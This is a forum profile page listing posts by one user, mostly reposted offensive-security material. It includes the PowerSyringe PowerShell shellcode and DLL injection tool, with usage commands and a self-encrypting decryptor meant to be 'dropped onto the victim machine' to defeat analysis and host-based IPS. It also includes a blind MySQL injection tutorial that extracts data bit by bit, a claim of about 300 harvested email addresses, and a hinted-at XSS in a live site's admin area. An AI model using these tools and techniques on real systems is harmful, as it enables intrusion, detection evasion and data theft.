ionut97
-
Posts
233 -
Joined
-
Last visited
-
Days Won
14
Posts posted by ionut97
-
-
Download Link: PowerSyringe.ps1
So I decided to expand upon my previous post and create a slightly more full-featured Powershell-based code/DLL injection utility. Behold, PowerSyringe. As the name implies, I based some of the code on the original Syringe toolkit. I added several features though - specifically, 64-bit support and encryption. Here is a rundown of its features:
Shellcode injection from within Powershell
Shellcode injection into any 32 or 64-bit process
DLL injection into any 32 or 64-bit process
Encryption - The script can encrypt itself and outputs the encrypted version to .\evil.ps1. This will make analysis of the script impossible/improbable without the correct password and salt (or if they happen to perform live memory forensics). >D
Decryption - evil.ps1 will decrypt itself back into its original form if you provide the right password and salt
Doesn't flag DEP b/c it doesn't execute in the stack
Fairly detailed documentation
I’ve tested the tool on several 32 and 64-bit platforms but I would love to get some feedback/feature requests. To execute the script, ensure that your execution policy allows you to execute scripts. If not, no worries. You can simply copy and paste the all of the code into a PowerShell prompt. Then you can run ‘help PowerSyringe -full’ for detailed documentation. There are several other methods for bypassing the execution policy. One of those methods is detailed here.
Here is an excerpt of the documentation with usage examples:
DLL Injection
C:\PS>PowerSyringe 1 4274 .\evil.dll
Description
Inject 'evil.dll' into process ID 4274.
Inject shellcode into process
C:\PS>PowerSyringe 2 4274
Description
Inject the shellcode as defined in the script into process ID 4274
Execute shellcode within the context of PowerShell
C:\PS>PowerSyringe 3
Description
Execute the shellcode as defined in the script within the context of Powershell.
Encrypt the script with the password:'password' and salt:'salty'
C:\PS>PowerSyringe 4 .\PowerSyringe.ps1 password salty
Description
Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext.
Note: This command can be used to encrypt any text-based file/script
Decrypt encrypted script and execute it in memory
C:\PS>[string] $cmd = Get-Content .\evil.ps1
C:\PS>Invoke-Expression $cmd
C:\PS>$decrypted = de password salt
C:\PS>Invoke-Expression $decrypted
Description
After you run the encryption option and generate evil.ps1 these commands will decrypt and execute
(i.e. define the function) PowerSyringe entirely in memory assuming you provided the proper password and salt combination.
Upon successful completion of these commands, you can execute PowerSyringe as normal.
Note: "Invoke-Expression $decrypted" may generate an error. Just ignore it. PowerSyringe will
still work.
This is what evil.ps1 will look like after the encryption function is called:
function de([String] $b, [String] $c)
{
# $a (encrypted PowerSyringe.ps1) truncated for sanity
$a = "M4g3yq9lTiMC+GTN2qNCRuUg1TFM8bgSvlxl/ENmXWpEIIgrdMq31/Jl025jClm9CcVZz7VIA40TV..."
$encoding = New-Object System.Text.ASCIIEncoding;
$dd = $encoding.GetBytes("CRACKMEIFYOUCAN!");
$aa = [Convert]::FromBase64String($a);
$derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2);
[Byte[]] $e = $derivedPass.GetBytes(32);
$f = New-Object System.Security.Cryptography.RijndaelManaged;
$f.Mode = [System.Security.Cryptography.CipherMode]::CBC;
[Byte[]] $h = New-Object Byte[]($aa.Length);
$g = $f.CreateDecryptor($e, $dd);
$i = New-Object System.IO.MemoryStream($aa, $True);
$j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read);
$r = $j.Read($h, 0, $h.Length);
$i.Close();
$j.Close();
$f.Clear();
return $encoding.GetString($h,0,$h.Length);
}As you can see, the decryption script is slightly 'obfuscated' if you even want to call it that. It's pretty obvious that it decrypts the $a variable. Unfortunately, anyone performing analysis on this evil script will have no idea what the contents of $a are without the correct password and salt.
The primary reason I wrote this was because I had been using Syringe on assessments to bypass host-based IPS systems but I didn't like some of the limitations of Syringe (specifically, no 64-bit support) and I like the idea of performing everything in memory without needing to drop any executables. That being said, I welcome your constructive feedback.
Enjoy!
Source:Exploit Monday: PowerSyringe - PowerShell-based Code/DLL Injection Utility
-
Toate aceste probleme au o rezolvare general?: modul prin care se calculeaz? totalul este gre?it.
Am stat sa ma gandesc putin la aceasta problema si mi-am dat seama de acest lucru.
Defapt problema vine asa: 50+50=100,100-97=3 si trebuie sa dai inapoi cate 50 de euro,dar mai dai cate 1 din cei 3 ramasi si astfel mai trebuie sa mai raman de platit 49 euro la fiecare parinte.Si 49+49=98 care sunt banii care trebuie inapoiati,deci nu avem de ce sa adaugam si 1 nostru.Deci ,pe scurt,aveam 3 euro ramasi si trebuia sa platim cei 100 de euro imprumutati ,mai dam 2 euro (3-2=1 euro ramas) si raman doar 98 de platit (100-2=98 de platit) si aici nu mai avem de ce sa adunam altceva.
Sau nu le mai dadeam nimic.
-
Faster Blind MySQL Injection Using Bit Shifting
###
# Faster blind MySQL injection using bit shifting | Ack Ack for a HTML version
# Made by Jelmer de Hen
# H.ackAck.net
#####
While strolling through mysql.com I came across this page MySQL :: MySQL 5.0 Reference Manual :: 12.11 Bit Functions.
There you can view the possibility of the bitwise function right shift.
A bitwise right shift will shift the bits 1 location to the right and add a 0 to the front.
Here is an example:
mysql> select ascii(b'00000010');
+--------------------+
| ascii(b'00000010') |
+--------------------+
| 2 |
+--------------------+
1 row in set (0.00 sec)
Right shifting it 1 location will give us:
mysql> select ascii(b'00000010') >> 1;
+-------------------------+
| ascii(b'00000010') >> 1 |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)
It will add a 0 at the front and remove 1 character at the end.
00000010 = 2
00000010 >> 1 = 00000001
^ ^
0 shifted
So let's say we want to find out a character of a string during blind MySQL injection and use the least possible amount of requests and do it as soon as possible we could use binary search but that will quickly take a lot of requests.
First we split the ascii table in half and try if it's on 1 side or the other, that leaves us ~64 possible characters.
Next we chop it in half again which will give us 32 possible characters.
Then again we get 16 possible characters.
After the next split we have 8 possible characters and from this point it's most of the times guessing or splitting it in half again.
Let's see if we can beat that technique by optimizing this - but first more theory about the technique I came up with.
There are always 8 bits reserved for ASCII characters.
An ASCII character can be converted to it's decimal value as you have seen before:
mysql> select ascii('a');
+------------+
| ascii('a') |
+------------+
| 97 |
+------------+
1 row in set (0.00 sec)
This will give a nice int which can be used as binary.
a = 01100001
If we would left shift this character 7 locations to the right you would get:
00000000
The first 7 bits are being added by the shift, the last character remains which is 0.
mysql> select ascii('a') >> 7;
+-----------------+
| ascii('a') >> 7 |
+-----------------+
| 0 |
+-----------------+
1 row in set (0.00 sec)
a = 01100001
01100001 >> 7 == 00000000 == 0
01100001 >> 6 == 00000001 == 1
01100001 >> 5 == 00000011 == 3
01100001 >> 4 == 00000110 == 6
01100001 >> 3 == 00001100 == 12
01100001 >> 2 == 00011000 == 24
01100001 >> 1 == 00110000 == 48
01100001 >> 0 == 01100001 == 97
When we did the bitshift of 7 we had 2 possible outcomes - 0 or 1 and we can compare it to 0 and 1 and determine that way if it was 1 or 0.
mysql> select (ascii('a') >> 7)=0;
+---------------------+
| (ascii('a') >> 7)=0 |
+---------------------+
| 1 |
+---------------------+
1 row in set (0.00 sec)
It tells us that it was true that if you would shift it 7 bits the outcome would be equal to 0.
Once again, if we would right shift it 6 bits we have the possible outcome of 1 and 0.
mysql> select (ascii('a') >> 6)=0;
+---------------------+
| (ascii('a') >> 6)=0 |
+---------------------+
| 0 |
+---------------------+
1 row in set (0.00 sec)
This time it's not true so we know the first 2 bits of our character is "01".
If the next shift will result in "010" it would equal to 2; if it would be "011" the outcome would be 3.
mysql> select (ascii('a') >> 5)=2;
+---------------------+
| (ascii('a') >> 5)=2 |
+---------------------+
| 0 |
+---------------------+
1 row in set (0.00 sec)
It is not true that it is 2 so now we can conclude it is "011".
The next possible options are:
0110 = 6
0111 = 7
mysql> select (ascii('a') >> 4)=6;
+---------------------+
| (ascii('a') >> 4)=6 |
+---------------------+
| 1 |
+---------------------+
1 row in set (0.00 sec)
We got "0110" now and looking at the table for a above here you can see this actually is true.
Let's try this on a string we actually don't know, user() for example.
First we shall right shift with 7 bits, possible results are 1 and 0.
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 7)=0 |
+--------------------------------------+
| 1 |
+--------------------------------------+
1 row in set (0.00 sec)
We now know that the first bit is set to 0.
0???????
The next possible options are 0 and 1 again so we compare it with 0.
mysql> select (ascii((substr(user(),1,1))) >> 6)=0;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 6)=0 |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)
Now we know the second bit is set to 1.
01??????
Possible next options are:
010 = 2
011 = 3
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 5)=2 |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)
Third bit is set to 1.
011?????
Next options:
0110 = 6
0111 = 7
mysql> select (ascii((substr(user(),1,1))) >> 4)=6;
+--------------------------------------+
| (ascii((substr(user(),1,1))) >> 4)=6 |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.00 sec)
This bit is also set.
0111????
Next options:
01110 = 14
01111 = 15
mysql> select (ascii((substr(user(),1,1))) >> 3)=14;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 3)=14 |
+---------------------------------------+
| 1 |
+---------------------------------------+
1 row in set (0.00 sec)
01110???
Options:
011100 = 28
011101 = 29
mysql> select (ascii((substr(user(),1,1))) >> 2)=28;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 2)=28 |
+---------------------------------------+
| 1 |
+---------------------------------------+
1 row in set (0.00 sec)
011100??
Options:
0111000 = 56
0111001 = 57
mysql> select (ascii((substr(user(),1,1))) >> 1)=56;
+---------------------------------------+
| (ascii((substr(user(),1,1))) >> 1)=56 |
+---------------------------------------+
| 0 |
+---------------------------------------+
1 row in set (0.00 sec)
0111001?
Options:
01110010 = 114
01110011 = 115
mysql> select (ascii((substr(user(),1,1))) >> 0)=114;
+----------------------------------------+
| (ascii((substr(user(),1,1))) >> 0)=114 |
+----------------------------------------+
| 1 |
+----------------------------------------+
1 row in set (0.00 sec)
Alright, so the binary representation of the character is:
01110010
Converting it back gives us:
mysql> select b'01110010';
+-------------+
| b'01110010' |
+-------------+
| r |
+-------------+
1 row in set (0.00 sec)
So the first character of user() is "r".
With this technique we can assure that we have the character in 8 requests.
Further optimizing this technique can be done.
The ASCII table is just 127 characters which is 7 bits per character so we can assume we will never go over it and decrement this technique with 1 request per character.
Chances are higher the second bit will be set to 1 since the second part of the ASCII table (characters 77-127) contain the characters a-z A-Z - the first part however contains numbers which are also used a lot but when automating it you might just want to try and skip this bit and immediatly try for the next one.
© Offensive Security 2011
Source:Vulnerability analysis, Security Papers, Exploit Tutorials
-
-
-
-
Am cenzurat pentru ca ,dupa cum vezi, in al doilea URL se vede /admin si acolo este ceva care s-ar putea sa ma ajute si la alt ceva decat XSS si nu am vrut sa intre toti si cei de la cancan sa repare vulnerabilitatea.Nu este greu de gasit oricum.
-
-
-
-
-
-
-
In jur de 300 de emailuri romanesti extrase de mine.
Link:
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
Nu dati indicii.Poate o sa ii trebuiasca cuiva.
-
-
-
-
Cel mai ghinionist hot din lume.
Printre search-urile lui a gasit "free porn" de cateva ori.
Si pozele din email fac toti banii. -
-
-
Mihai BUDIU -- budiu+ at cs.cornell.edu, mihaib@pub.ro
http://www.cs.cornell.edu/Info/People/budiu/budiu.html
Subiect :
Sistemele de fi?iere in Unix.
Cuvinte cheie:
fi?ier, parti?ie, i-nod, director, leg?tur?.
Cuno?tin?e necesare:
no?iuni elementare despre: un sistem de operare, structuri de date, shell-ul Unix.
Contents
Terminologia
Cu ce obiecte lucr?m
Parti?ia
Fi?ierele
Structura de date
Blocul de boot
Superblocul
I-nodurile
Zona de date
Lista de blocuri libere
Crearea unui sistem de fi?iere
Opera?iile pe fi?iere
Directoarele
Linkurile . ?i ..
Directorul r?d?cin?
Opera?iile pe directoare
G?sirea i-nodului unui fi?ier
Crearea ?i distrugerea fi?ierelor
Programul fsck
Un experiment
R?spuns:
Chiar ?i cei mai naivi utilizatori ai unui calculator au de a face cu sistemul de fi?iere în majoritatea timpului (termenul este consacrat în jargonul informatic); o mai apropiat? privire asupra sa este salutar?.
-
Contents
Standards and Protocols
Cryptography
Cryptography, Security, and Politics
Cryptographic Toolkits/Libraries
Secure Hardware, Smartcards
Information Hiding (Steganography, Fingerprinting)
Alert Sites
Collections of Pointers
Miscellaneous
Newsgroups on Security
Electronic Commerce --> "Electronic Commerce, Payment Systems, and Security"
Cybercrime --> "Cybercrime and e-Fraud"
-
-
Download de aici: https://github.com/Audi-1/sqli-labs
Un fel de DVWA bazat numai pe SQL injection.
In jur de 20 de injectii diferite.-
1
-
Have you ever chatted with a Hacker within a virus?
in Off-topic
Posted
This is an impressive and first-time experience in my anti-virus career. I chatted with a hacker while debugging a virus. Yes, it’s true. It happened when the Threat team were researching key loggers for Diablo III while many game players playing this game found their accounts stolen. A sample is found in battle .net in Taiwan, China. The hacker posted a topic titled “How to farm Izual in Inferno” (Izual is a boss in Diablo III ACT 4), and provided a link in the content which, as he said, pointed to a video demonstrating the means.
Below is the ‘Video’. It’s a RAR archive actually containing two executable files. These two files are almost the same except the icon.
The malware will connect to a remote server via TCP port 80 and download a new file packed by Themida.
That’s very simple Downloader/Backdoor behavior and we are only interested in looking for key logging code for Diablo III so we didn’t pay much attention to it.
But an astonishing scene staged at this time. A chatting dialog popped up with a text message:
(Translated from the image below)
Hacker: What are you doing? Why are you researching my Trojan?
Hacker: What do you want from it?
The dialog is not from any software installed in our virtual machine. On the contrary, it’s an integrated function of the backdoor and the message is sent from the hacker who wrote the Trojan. Amazing, isn’t it? It seems that the hacker was online and he realized that we were debugging his baby.
We felt interested and continued to chat with him. He was really arrogant.
(Translated from the image below)
Chicken: I didn’t know you can see my screen.
Hacker: I would like to see your face, but what a pity you don’t have a camera.
He is telling the truth. This backdoor has powerful functions like monitoring victim’s screen, mouse controlling, viewing process and modules, and even camera controlling.
We then chatted with hacker for some time, pretending that we were green hands and would like to buy some Trojan from him. But this hacker was not so foolish to tell us all the truth. He then shut down our system remotely.
Regarding this malware, no Diablo III key logging code was captured. What it really wants to steal is dial up connection’s username and password.
t sounds like a movie story, but it’s real. We are familiar with malware and we are fighting with them every day. But chatting with malware writers in real time doesn’t happen so often. Next time, I will be on the alert.
The malware and its components are detected by the AVG as Trojan horse BackDoor.Generic variants.
Franklin Zhao & Jason Zhou
Source:Have you ever chatted with a Hacker within a virus?